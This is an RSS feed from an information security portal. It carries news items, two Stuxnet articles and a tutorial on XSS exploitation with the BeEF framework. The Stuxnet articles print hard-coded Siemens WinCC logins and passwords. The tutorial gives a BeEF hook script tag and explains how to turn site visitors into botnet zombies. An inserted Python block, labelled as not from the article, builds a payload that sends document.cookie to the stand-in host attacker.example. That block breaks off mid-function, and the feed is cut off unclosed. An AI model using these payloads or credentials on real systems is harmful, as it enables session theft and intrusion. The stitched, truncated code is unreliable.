<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BlueKaizen</title>
	<atom:link href="https://www.bluekaizen.org/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.bluekaizen.org</link>
	<description>Information Security Portal</description>
	<lastBuildDate>Sat, 30 Mar 2019 12:58:35 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.2.1</generator>
	<item>
		<title>cypertalents</title>
		<link>https://www.bluekaizen.org/cypertalents/</link>
				<pubDate>Wed, 22 Mar 2017 08:08:44 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3864</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2017/03/banner_design-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2017/03/banner_design-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2017/03/banner_design-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>Click here for more details]]></description>
									</item>
		<item>
		<title>Stuxnet PART2 : And The Truth Shall Set You Free</title>
		<link>https://www.bluekaizen.org/stuxnet-part2-and-the-truth-shall-set-you-free/</link>
				<pubDate>Wed, 30 Mar 2016 10:32:07 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3760</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/03/computer_worm_targets_iran_chappatte-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/03/computer_worm_targets_iran_chappatte-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/03/computer_worm_targets_iran_chappatte-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>
PART 1 of the Stuxnet article: http://goo.gl/Xi7fU7

What is Stuxnet: it’s the most complicated piece of malware ever written. Up till now there has been wide speculation that it was written by a specific country to attack the Siemens computer control systems used in the nuclear program of Iran. Security experts heavily criticized Siemens because the worm exploited, among many things, a “hard coded password” in the Siemens system. The Stuxnet worm infected critical energy companies in 125 countries.

Siemens Internal CERT (Computer Emergency Response Team) released some slides about Stuxnet as a form of “Official Communication” to their constituents. The slides were taken offline a few hours later. But as I was reading through the slides I decided to take a copy just in case they did just that. In the official slides (Here), Siemens confirmed that Stuxnet was a “targeted” attack by using terms like “targeting a very specific configuration, certain PLC blocks and specific processes or (project)”. These bold statements simply mean that the Stuxnet makers had one target in mind, and this should eliminate any theory out there denying that it’s a state-sponsored malware.

The slides confirmed that the malware is capable of transferring data out of the infected system back to the command and control servers, yet nothing has been proven, especially since the two C&#38;C servers (www[.]mypremierfutbol[.]com and www[.]todaysfutbol[.]com) were brought down by Symantec. “I would like to add that both servers were located in Germany”.

Then the Siemens slides claim that all known infections are now clean and zero enterprise damages have been reported. Yet they didn’t specify their definition of “damage”: is it seeing the enterprise up in flames, or a few bytes of data going out? The slides go on listing the great deeds of Siemens since the discovery of the malware: “white papers, cleaning tools, contacting customers, working with top AV vendors, even magazine interviews”. Isn’t this what they are paid to do?

What is really strange is their genius conclusion that future infections are “unlikely”, and this is due to the fact that the malware pattern is now detected by up-to-date anti-virus programs. Eureka!! Yes, future “Stuxnet” infections might be unlikely, but this is certainly not the end of this type of attack as long as top vendors like Siemens still use “hard coded &#38; publicly available” passwords on critical systems in the year 2010 and don’t even admit that this is the REAL problem.

I was able to locate the hard coded (built-in) user names and passwords in Siemens technical online forums: login=’WinCCConnect’ password=’2WSXcder’ login=’WinCCAdmin’ password=’2WSXcde

Another statement that also reflects a severe undermining of the terms “due diligence” and “responsibility” is a question they highlighted in yellow: “Has the customer done all he can?”. Imagine a car manufacturing company that sold you a very expensive car equipped with an advanced airbag system, then someone smashes into your car and the airbag doesn’t work, and while you are in hospital the car company lawyer asks you why you didn’t bring an airbag from home just in case!

About The Author
Omar Sherin. Mr. Omar Sherin is the head of critical information infrastructure protection (CIIP) at Qatar Computer Emergency Response Team (Q-CERT), an ictQATAR initiative. In this role he participates in technically assessing critical infrastructure, drafting guidelines such as the Qatari National ICS Security Standard, and conducting Qatar&#8217;s national cybersecurity drills. He is also an international partner of the Industrial Control Systems Joint Working Group (ICSJWC) and a certified business continuity professional, certified ethical hacker, and ISO 27001 lead auditor. He has more than 11 years of professional experience in information security and resiliency, and has worked for several multinational firms in the oil and gas sector.]]></description>
									</item>
		<item>
		<title>Join to Win 25,000 AED of Cash Prizes GISEC CTF- Competition</title>
		<link>https://www.bluekaizen.org/gisec-ctf-capture-the-flag-competition/</link>
				<pubDate>Tue, 15 Mar 2016 09:29:56 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3776</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/03/3184535916-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/03/3184535916-150x150.png 150w, https://www.bluekaizen.org/wp-content/uploads/2016/03/3184535916-75x75.png 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>
A Head To Head Battle for the Future of Technology

For the first time in the GCC, the world’s greatest security enthusiasts will test their mettle in a head-to-head cyber security competition covering a range of technology challenges from network security to cryptography, web security and digital forensics.

JOIN THE CTF COMPETITION TODAY

Future Technology Week’s Capture-The-Flag Competition, held in association with CyberTalents.com, will see cyber security enthusiasts take part in various challenges to find the hidden ‘flag’ across a range of categories covering multiple levels of difficulty, including:
● Reverse engineering
● Network security
● Cryptography
● Web security
● Digital forensics

TIMINGS: 8 am – 5 pm on 31st March 2016.
PRIZE: AED 25,000 will be awarded to the winning team at the close of the competition.

Prize Sponsor

About Offensive Bits
Offensive Bits is an Emirati information security consultancy company founded by two UAE-national security experts. OffensiveBits’ visionary co-founders realized the need for a high quality security consultancy service in the region, due to the ever-increasing threat landscape and the advancement in attack methods and techniques. Therefore, OffensiveBits was established to ease security challenges for organizations by identifying the security weaknesses in patched and hardened systems. In addition, Offensive Bits is actively contributing to the information security community in the UAE and in the region by reporting critical security issues and zero-day vulnerabilities to government entities, federal authorities and affected vendors.

HOW TO TAKE PART

Qualification Phase
The Capture-The-Flag Competition is open to competitors from across the globe, with each participant having to pass an online qualification prior to the event, ensuring their knowledge and skills are up to the required level. Teams who are able to solve their qualification challenge will then be eligible to play in the final phase, held live at Future Technology Week at Dubai World Trade Centre.

Grand Final
Once each competitor has passed the qualification stage they will then be able to form teams of between two and five competitors. Each team will contain a number of different technology skill sets in order to allow them to solve as many challenges and accumulate as many points as possible. At the end of the event the team with the most points will be crowned the Future Technology Week CTF Champion 2016.

ABOUT CYBERTALENTS.COM
The first Capture the Flag competition will be organised in collaboration between DWTC and CyberTalents.com. Cyber Talents is a platform that helps universities, schools, governments and companies to discover and recruit talents across a range of cyber security fields through hosted Hackathons, competitions and online lab assessments.]]></description>
									</item>
		<item>
		<title>RSA Conference 2016 Brought Together Top Information Security Experts To Debate Critical Cybersecurity Issues At 25th Anniversary Event</title>
		<link>https://www.bluekaizen.org/rsa-conference-2016-brought-together-top-information-security-experts-to-debate-critical-cybersecurity-issues-at-25th-anniversary-event/</link>
				<pubDate>Tue, 08 Mar 2016 10:57:04 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3770</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/03/rsa-conference-2016-recap-takeaways-developers-it-ops-security-devops-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/03/rsa-conference-2016-recap-takeaways-developers-it-ops-security-devops-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/03/rsa-conference-2016-recap-takeaways-developers-it-ops-security-devops-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>
March 7, 2016

RSA CONFERENCE 2016 BROUGHT TOGETHER TOP INFORMATION SECURITY EXPERTS TO DEBATE CRITICAL CYBERSECURITY ISSUES AT 25TH ANNIVERSARY EVENT
Record Number of Attendees Filled the Moscone Center to Set the Industry Agenda for 2016

SAN FRANCISCO – March 7, 2016 – RSA Conference, the world’s leading information security conference and exposition, concluded its 25th annual event last Friday at the Moscone Center in San Francisco. Keynotes, sessions and debates focused on the Internet of Things, industrial control systems, encryption, artificial intelligence and machine learning, crowdsourcing, healthcare, automotive, and more, with many reflecting current industry news. A record number of more than 40,000 attendees experienced keynotes, peer-to-peer sessions, track sessions, tutorials and seminars.

“RSA Conference continues to be the premier security event, with each event seeing more attendees than ever before, and RSA Conference 2016 was no exception,” said Linda Gray, General Manager of RSA Conference. “Our 25th anniversary marks not only a milestone in the conference’s reach and impact in this important industry, but is also a testament to the work we as a community are doing together. There were a lot of great discussions over the course of the week, and I look forward to the positive impact these will make on our world moving forward. We thank the cybersecurity community for its continued support, innovation, spirit and drive as we shape the future of our industry, together.”

RSA Conference 2016 highlights include:

Hot session topics and presentations:
● Gerhard Eschelbeck, Vice President Security Engineering at Google, gave a packed house an inside look at what it’s like heading up security for one of the world’s biggest tech companies and hacker targets during “My Life as Chief Security Officer at Google.”
● Ben Rothke, Senior eGRC Consultant, The Nettitude Group; Phil Agcaoili, SVP &#38; Chief Information Security Officer, Elavon; Roland Cloutier, VP &#38; CSO, ADP, Inc.; and Jack Jones, EVP Research &#38; Development, RiskLens shared their strategies for success at the “Habits of an Effective CISO” panel.
● Attendees learned how to effectively tell their security story and speak the language of business at “The Measure of Success: Security Metrics to Tell Your Story” panel with Lisa Lee, Senior IT Examiner, Office of the Comptroller of the Currency; Julie Bernard, Principal, Cyber Risk Services, Deloitte; and Wendy Frank, Principal, PwC.
● First-time presenters William Bengtson, Senior Security Program Manager, Nuna Health and Robert Wood, CISO, Nuna Health, Inc. highlighted how defenses and strategy must evolve with attacker tactics, techniques and procedures at “The Rise of the Purple Team.”
● As the year begins, Mario Vuksan, CEO, ReversingLabs, reviewed fundamental industry shifts and how to adopt, trust and build software at “Threats of Greatest Consequences Heading into 2016.”

Phantom was named “RSA Conference 2016’s Most Innovative Startup” by the Innovation Sandbox’s judges’ panel, comprised of technology, venture and security industry thought leaders.

The Conference reached a new audience at the first-ever, interactive CyberSmart: Parents Education Workshop. Parents from across the Bay Area gathered to learn more about how to teach their children to interact safely with technology.

The inaugural Security Scholars Program brought together the brightest up-and-coming cybersecurity students from 10 participating public and private universities with leading experts, peers and conference attendees. Throughout the week, students made professional connections, discussed industry trends and participated in conference activities. The program concluded with a Poster Exhibition where scholars demoed and discussed their work while connecting with industry leaders.

RSA Conference donated space within the Moscone Center so industry professionals could meet the challenge to “go bald” with St. Baldrick’s Foundation to help raise awareness and money for childhood cancer research.

The 19th Annual RSA Conference Awards program highlighted the work of four security professionals in the fields of mathematics, public policy and security practices. This year’s winners included:
● Art Coviello, Jr – Lifetime Achievement Award
● Roland Cloutier, CSO, ADP – Excellence in the Field of Information Security
● Professor Ueli Maurer, ETH Zurich – Excellence in the Field of Mathematics
● Christopher M.E. Painter, Coordinator for Cyber Issues, U.S. Department of State – Excellence in the Field of Public Policy

RSA Conference 2016 Asia Pacific &#38; Japan takes place July 20-22, 2016, at Marina Bay Sands in Singapore. Additionally, RSA Conference returns to Abu Dhabi on Nov. 15-16, 2016. RSA Conference 2017 will take place Feb. 13-17 at the Moscone Center in San Francisco.

EXHIBITOR QUOTES

“RSA Conference showcased the breadth, depth and creativity of technologies and people arrayed against bad actors worldwide, whose singular mission is to penetrate and to exploit. Speaking with counterparts from organizations focused on protecting data, networks and applications, I gained even more confidence that collectively we’re up to the challenge. While the attack methods and surfaces are constantly changing, defending against penetration and internal leaks remains a major focus. At RSAC this year we saw a marked increase in the number of solutions coming to market that are focused on doing both through better application security. As organizations continue to advance their application security initiatives, collectively we will adapt and continue to thwart the bad guys.” – Lou Shipley, CEO, Black Duck

“RSA Conference 2016 was a strong reiteration of the message that the industry needs a more comprehensive approach to ensuring information is secure regardless of platform. As security professionals, we’re responsible for ensuring information is protected regardless of device, platform or operating system. We don’t just use one, we use all solutions: cloud, mobile, network, data center, SaaS. Businesses need a method to ensure control between traditional infrastructures, cloud and mobile to establish trust with the customers. To get out of a reactive state and into proactively defending data, companies have to look for solutions that enable a control plane. Without it, there is no single source of trust.” – Stan Black, CSO, Citrix

“We had an incredible week at RSA Conference, an event known for gathering the biggest movers, shakers and disruptors in the industry. This year, it is clear enterprises are making great strides to adopt new technologies to help them battle the onslaught of cyber threats. As a company recently out of stealth, Fireglass...]]></description>
									</item>
		<item>
		<title>Infoblox to Showcase Market Leading DNS Security Solutions at GISEC 2016</title>
		<link>https://www.bluekaizen.org/infoblox-to-showcase-market-leading-dns-security-solutions-at-gisec-2016/</link>
				<pubDate>Thu, 03 Mar 2016 14:11:21 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3765</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/03/Infoblox-Logo-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/03/Infoblox-Logo-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/03/Infoblox-Logo-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>
DUBAI, United Arab Emirates, 3rd March, 2016: Infoblox Inc., the network control company, today announced its participation at Gulf Information Security Expo &#38; Conference (GISEC) 2016, taking place at Dubai World Trade Centre between 29th – 31st March, 2016. As the industry leader in DNS, DHCP, and IP address management, the category known as DDI, the company will be demonstrating its critical network services and solutions that protect Domain Name System (DNS) infrastructure, automate cloud deployments, and increase the reliability of enterprise and service provider networks around the world.

Cherif Sleiman, General Manager, Middle East at Infoblox says, “Our solutions reduce the risk and complexity of networking. The company’s solutions automate network-control functions to reduce costs and maximize uptime, and they protect against the rising flood of malware and distributed-denial-of-service (DDoS) attacks. From discovery, configuration and compliance to DNS, DHCP, and IP address management, our technology automates and simplifies complex processes. And our purpose-built DNS security solutions defend against a wider range of threats than any other product available.”

“It’s critical that the technology deployed for network control provides maximum protection and offers minimum attack surface. Infoblox clearly differentiates from other vendors from a security perspective. From our highly secure hardware form factor, to our hardened OS, to the variety of security features in our applications—no other network control vendor focuses more on security than Infoblox,” continues Cherif.

Infoblox will be using GISEC as an opportunity to also educate attendees about its recent acquisition of IID, a leader in global cyber threat intelligence. Prioritizing threats, getting contextual information and operational viability are top challenges organizations face when trying to assimilate threat intelligence and respond to threats. According to Gartner’s 2015 Market Guide for Security Threat Intelligence Services, by 2018, 60% of enterprises will utilize commercial threat intelligence services to help inform their security strategies. However, enterprises still struggle to absorb, contextualize, and respond to the information in an effective manner. Infoblox and IID bring together threat intelligence and enterprise context to take action at the control point of the network. With Infoblox’s acquisition of IID, customers can prioritize, protect and predict the security threats facing their networks.

With Infoblox’s acquisition of IID, customers will benefit from on-premise synergies of threat intelligence and context-driven response, protection for company devices that are off premises, and sharing of highly prioritized and actionable threat intelligence to improve the efficacy of the broader security ecosystem.

“Acquiring IID helps enable Infoblox to offer deeply integrated threat intelligence with our on-premise solutions. This will help give customers more understanding of security events, going beyond what would be possible if we only set up a partnership with IID,” concludes Cherif.

Infoblox will be exhibiting at GISEC from Help AG stand number B-100 located in Sheikh Rashid Hall, Dubai World Trade Centre.

-Ends-

Photo Caption: Cherif Sleiman, General Manager, Middle East at Infoblox

Product Information Contact:
Mr. Cherif Sleiman, General Manager Middle East, Infoblox, Dubai, UAE
Email: csleiman@infoblox.com

Media Contact:
Colin Saldanha, PROCRE8
Email: colin@procre8.biz]]></description>
									</item>
		<item>
		<title>Stuxnet PART1 : The PERFECT CRIME</title>
		<link>https://www.bluekaizen.org/stuxnet-part1-the-perfect-crime/</link>
				<pubDate>Mon, 29 Feb 2016 13:30:53 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3752</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/02/google-news-20101-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/02/google-news-20101-150x150.png 150w, https://www.bluekaizen.org/wp-content/uploads/2016/02/google-news-20101-75x75.png 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>
Summary

Recently there has been a new computer worm that has gained lots of attention from the computer security community, the energy sector, the media and even the general public. It’s the “Stuxnet” worm. The reason for this unsurprising attention is that “Stuxnet” is one of the most complex computer threats the world has ever seen. I decided to write two articles about the worm. The article that you are currently reading is the first and acts as an introduction to the Stuxnet worm, its attack vectors and the motives behind it; the second article goes under the hood and takes a closer look at the technical aspects of the worm and the SCADA systems targeted.

1 &#8211; Introduction

Stuxnet is a computer worm that was written to target Programmable Logic Controllers (PLCs). PLCs are part of a bigger automation environment called SCADA (supervisory control and data acquisition) systems; SCADA systems are special computer programs used to run mega infrastructure projects, like gas pipelines, electricity grids, nuclear facilities and power plants.

Stuxnet was carefully written to “access, and in some cases reprogram” those PLCs by modifying certain pieces of the code stored on them. The purpose of this “reprogramming” is to make those PLCs work in the manner the attacker intended and to hide those changes from the operator of the equipment. In other words, the Stuxnet creators wanted to plant something, hide it well and then have the option to control, eavesdrop or cause damage from a remote location. In order to achieve this multipurpose goal, the worm creators used a record number of different components to increase their chances of success. This includes, but is not limited to:
● Zero-day exploits (a total of four unpatched Windows holes to facilitate the worm’s entry; initial infections were probably caused by USB)
● A Windows rootkit (a collection of malicious programs designed for Windows operating systems – like a Swiss army knife, this includes an array of tools and can do many things)
● The first ever SCADA/PLC rootkit (a collection of malicious programs designed for control systems – like a Swiss army knife, this includes an array of tools and can do many things)
● Antivirus evasion techniques (special techniques to trick the antivirus into believing that nothing is wrong)
● Complex process injection and hooking code (injects itself into certain parts of the SCADA software, allowing it to execute with high privilege)
● Network infection routines (uses the infected LAN to replicate and multiply)
● Peer-to-peer updates (can be updated remotely)
● Fake driver-signing certificates (used a signed yet expired “Realtek semiconductors .inc” hardware driver signing certificate to trick Windows into inherently trusting the malware)
● And a command and control interface (can be controlled remotely)

The Stuxnet creators were so professional in hiding their tracks that it’s nearly impossible, with the information we currently have, to know who wrote it. The source code of Stuxnet is full of references that have caused researchers to point fingers towards Israel, which is currently engaged in a political dispute with Iran regarding its nuclear program. One of the most notable references is the word “Myrtus,” which is the name of a specific Stuxnet file; according to the New York Times, linguists and Biblical scholars also highlighted that the term’s usage could refer to the Book of Esther in the Bible’s Old Testament. In the Book of Esther, Jewish forces &#8212; after unraveling a Persian attack plan &#8212; stage a preemptive and successful assault against their adversaries. (Source: New York Times, 30/9/2010)

Another reference buried in Stuxnet’s code is a marker with the digits “19790509” that the researchers believe is a “do-not-infect” indicator. If the marker is found on a PC this means it’s already touched/infected or exempted, and the worm will stop in its tracks. The researchers &#8212; Nicolas Falliere, Liam O Murchu and Eric Chen &#8212; speculated that the marker represents a date: May 9, 1979. “While on May 9, 1979, a variety of historical events occurred, according to Wikipedia ‘Habib Elghanian was executed by a firing squad in Tehran sending shock waves through the closely knit Iranian Jewish community,’” the researchers wrote. (Source: Computer World, 30/9/2010) But again, this could simply be misleading information placed on purpose.

If the perfect crime is a crime that gets the perpetrators what they want without leaving a serious trace, then indeed Stuxnet is the perfect crime.

2 &#8211; First Discovery

Stuxnet was first announced in June 2010, although recent reports prove that it was already infecting systems since mid-2009. This gap between the first infection and the announcement of discovery is probably due to the fact that the majority of infections were in Iran, and that the creators of the worm were not seeking fame or media credit. They had a fixed target. The following table shall make it easier to follow the sequence of events.

3 &#8211; The Target

It’s now evident that Stuxnet is targeting only industrial control systems, especially the ones in Iran. The ultimate goal of Stuxnet is espionage against, and sabotage of, the critical infrastructures (like gas plants, refineries, nuclear facilities, etc.) that use this special Industrial Control Systems software. The espionage is done by checking for very specific variables on the infected host; those carefully selected variables can easily give away a lot of information about the type of operations taking place in the targeted facility. The damage can be easily achieved by remotely instructing the worm to “reprogram” certain variables that can make the facility overheat, for example.

4 &#8211; How does it spread?

The Stuxnet malware was initially spread via USB key. It may also be propagated via network shares from other infected computers sharing the same local network (LAN). As noted above, Stuxnet uses a specially crafted Windows shortcut placed on USB drives to automatically execute malware as soon as the .lnk file is read by the operating system. Disabling the auto-run feature is useless against this attack. In other words, simply browsing a USB drive using an application that displays shortcut icons (like Windows Explorer) runs the malware without any additional user interaction. Once the computer is infected, it will attempt to infect any other USB drive inserted into it. It is likely that any USB drive inserted in a machine will be viewed using some sort of file explorer, thus the chance of infection is very high.

5 &#8211; Infection Rates

According to a recently published report[2] from security firm “Symantec”, the infected hosts have reached nearly 100,000. It’s very alarming that such a high number of infections...]]></description>
									</item>
		<item>
		<title>Book Review : The Art of Deception Controlling the Human Element of Security</title>
		<link>https://www.bluekaizen.org/book-review-the-art-of-deception-controlling-the-human-element-of-security/</link>
				<pubDate>Thu, 25 Feb 2016 13:15:48 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Reviews]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3743</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/02/4-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/02/4-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/02/4-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>In Wikipedia's article for the word Hacker, Kevin Mitnick, the book's author, is the first name mentioned under the "Notable Security Hackers" section. Kevin was formerly known as "the most wanted computer criminal in United States history".

According to Kevin, what he did wasn't even against the law at the time, but it became a crime after new legislation was passed. The book is mainly concerned with exploring the term "Social Engineering" and illustrating how it can be used to breach security systems with ease. It shows that no matter what antivirus, firewall appliances or software you use, the human factor remains the weakest link in security.

It starts with a preface giving a brief biography of Kevin. His father split from his mother when he was three years old, and he was raised by his mother. She worked hard as a waitress to support them both, so unfortunately she had to leave him on his own most of the time. He describes himself in his childhood as being his own babysitter. His early skills became apparent when, at the age of 12, he discovered a way to ride the buses for free throughout Los Angeles. Later on, during his high school years, he met another student who was caught up in a hobby called "phone phreaking". As Kevin describes it: "Phone phreaking is a type of hacking that allows you to explore the telephone network by exploiting the phone systems and phone company employees".

This was when he started using what was later called "Social Engineering": deceiving and manipulating people into giving out confidential information which they would normally never reveal to a stranger. The first part of the book demonstrates the reasons behind calling the human factor security's weakest link. In the second part, Kevin gives the reader examples of how Social Engineering can be used, through fictional stories. He ends each story by analyzing the con in it, followed by a "Mitnick Message" recommending how to deal with such a scenario.

The stories are grouped into chapters according to the theme used to trick the victim. The chapter titles easily draw the reader's curiosity to understand how a trick like that can work for a hacker, for example "The Direct Attack: Just Asking for It" or "Using Sympathy, Guilt, and Intimidation".

The third part is somewhat similar to the second, but it shows how Social Engineering can be combined with hacking, through more fictional stories demonstrating how a corporation's secured premises can be breached using Social Engineering to steal confidential information. Part four contains Kevin's general recommendations for corporations on preventing successful Social Engineering attacks on their organizations. It includes tips on how to build a successful security awareness training program and recommended corporate information security policies that can be customized for any organization and applied immediately to protect the company's information.

The book is very well written, with Kevin simplifying the concepts and presenting them in a way that even non-technical readers would find both informative and entertaining.

About The Author:

Mohamed Mohie, IS Engineer]]></description>
									</item>
		<item>
		<title>Advanced Exploitation of XSS</title>
		<link>https://www.bluekaizen.org/advanced-exploitation-of-xss/</link>
				<pubDate>Thu, 25 Feb 2016 11:26:22 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Grey Hat]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3727</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/02/xss-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/02/xss-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/02/xss-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>Disclaimer: The information provided in this article is intended for educational purposes only and should not be used in any illegal way.

Today we will talk about some not-so-typical cross-site scripting exploits. But first, what is XSS? (You can skip this part if you are already familiar with XSS.)

What is XSS?

XSS is an acronym for cross-site scripting; the X is used instead of a C because the acronym CSS was already taken by Cascading Style Sheets. XSS happens when a web application reflects user input back into a page without encoding or filtering it. If an attacker sends HTML or JavaScript in that input, the browser simply renders it as part of the page retrieved from the web server.

Is it really dangerous? The attacker cannot access the server, right?

Well, some people just ignore XSS (I reported two of them on live websites: one report was simply ignored, and the other bug is still there today; the administrator told me that it is not that dangerous). Even those who know the bug exists dismiss it because it does not affect the server directly. But what if the attacker injects code that steals the cookie holding the session information, and a system administrator visits the page? The attacker can now log in as that administrator and do whatever they want, and the same trick works against any ordinary user.

Another attack vector is social engineering, because I can literally put anything in the affected website; for instance, I can put a fake login form that sends me the user's credentials once the user logs in, or redirect them to another website.

How can an attacker abuse it to make money?

As mentioned before, the attacker can use it to steal cookies or for social engineering, but what is really dangerous is using it to build a botnet. Botnets are groups of computers controlled by an attacker. One way to build one is to find an XSS in a website and inject, through it, code that exploits a browser vulnerability to take control of the website visitors' computers. Once they have done that, they can make money by renting these computers to other criminals for tasks that would take a very long time on a single computer. Actually, you can rent a botnet of 10,000 computers for only $20/hour, which can launch distributed brute-force attacks or break password hashes or ciphers.

Is it easy to create a botnet?

Thanks to a web application known as BeEF (the Browser Exploitation Framework), you can collect a lot of zombies (the victim in a botnet is called a zombie) in an easy and automated process.

How to use BeEF?

BeEF is installed by default in the BackTrack 4 Final distribution; all you need to do is start it. Click the main menu button and then go to Services -&#62; BeEF -&#62; Setup BeEF.

On the first page you have to enter the configuration password (the default one is BeEFConfigPass).

Click the "apply config" button, then click "finished". After that you will see the front page of BeEF: on the left, a list of the so-called zombies (the computers you control); on the right, the logs. The centre is where the configuration options for whichever module you choose from the menu bar appear.

The menu bar: at the top you will see several sub-menus. The first one is "view", which lets you customize the view of the page and also contains an example web page that you can use to test BeEF. The second is the zombies menu, where you can choose a zombie to view the machine's information.

The third one is the standard modules, used mainly for gathering more information about the victim, such as whether they have Java, Flash, QuickTime or VBScript. This information lets you build the attack against the victim.

The fourth menu is called browser modules and contains some browser exploits and a malicious Java applet; the good thing is that it can also use Metasploit browser exploits. Now, to use BeEF you have to redirect the victims to your website or to a website that is vulnerable to XSS, and in both cases you have to include the BeEF hook script. That means you have to add the following line to the page through the XSS, or to your own website if you want to create a malicious one:

&#60;script language=javascript src=http://127.0.0.1/beef/hook/beefmagic.js.php&#62;&#60;/script&#62;

To see how it looks when someone visits the hooked page, open the example page from the same machine or from another machine. You will see that your IP address has been added to the list on the left side. From the zombies menu (on the upper menu bar) choose your IP address.

You can see details about the operating system and the browser used. Click on the standard modules and choose the "detect flash" module, for example. You will see two buttons: "set autorun", which makes the module run automatically every time someone visits the page, and "send now", which runs the module manually.
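
The reflection bug described at the start of this article, and the injection of the BeEF hook line through it, as an added Python example (this is not code from the article or from BeEF). The two page-rendering functions stand in for a search page that echoes its query; the attacker.example host, the victim.example URL and the cookie-stealing payload are assumptions constructed for the demo, while the hook line is the one quoted above.

```python
import html
from urllib.parse import quote

# Constructed payloads of the two kinds the article describes.
# attacker.example is a placeholder, not a real collection server.
ATTACKER_HOST = "attacker.example"
COOKIE_STEALER = (
    "<script>new Image().src='http://" + ATTACKER_HOST
    + "/c?'+encodeURIComponent(document.cookie)</script>"
)
# The BeEF hook line from the article, injected the same way.
BEEF_HOOK = ('<script language=javascript '
             'src=http://127.0.0.1/beef/hook/beefmagic.js.php></script>')


def render_search_vulnerable(query):
    """Reflects the query straight into the markup: this is the XSS bug."""
    return "<html><body><p>Results for: " + query + "</p></body></html>"


def render_search_fixed(query):
    """Same page, but the query is HTML-encoded before it is placed in the markup.
    quote=True also encodes ' and " so the value would be safe inside an attribute."""
    return ("<html><body><p>Results for: "
            + html.escape(query, quote=True) + "</p></body></html>")


def attack_url(base_url, payload):
    """The link an attacker sends a victim: the payload URL-encoded in the q parameter."""
    return base_url + "?q=" + quote(payload, safe="")


def executes_script(page):
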